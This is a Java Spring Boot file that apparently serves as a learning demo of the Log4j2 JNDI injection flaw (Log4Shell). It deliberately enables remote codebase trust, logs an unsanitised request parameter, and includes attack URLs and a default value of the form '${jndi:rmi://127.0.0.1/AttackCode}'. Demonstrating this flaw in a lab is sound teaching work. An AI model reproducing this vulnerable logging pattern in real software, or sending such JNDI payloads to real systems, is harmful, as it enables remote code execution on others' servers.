package com.yesep.learn.log4j2.web;

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;

@RestController
@SpringBootApplication
public class App {
    private static final Logger logger = LogManager.getLogger(App.class);

    /**
     * 日志框架 log4j2、 logback没有任何
     * fast json 漏洞注入的bug 远程注入
     *
     * @param args
     */
    public static void main(String[] args) throws Exception {
        //设置为false,rmi加载远程的字节码不会执行成功
        System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
        SpringApplication.run(App.class);
    }


    /**
     * 攻击案例
     * http://127.0.0.1:8080/kit?name=$%7Bjndi:rmi://127.0.0.1:1099/AttackCode%7D
     * http://127.0.0.1:8080/kit?name=$%7Bjndi:rmi://127.0.0.1:1099/AttackCode%7D
     *
     * @param name
     * @return
     */
    @RequestMapping("/kit")
    public String getKit(String name) {
        if (null == name || name.trim().length() == 0) {
            name = "${jndi:rmi://127.0.0.1/AttackCode}";
        }
        // name.replace("$", "---");
        logger.info(name);
        return "name:" + name;
    }


}
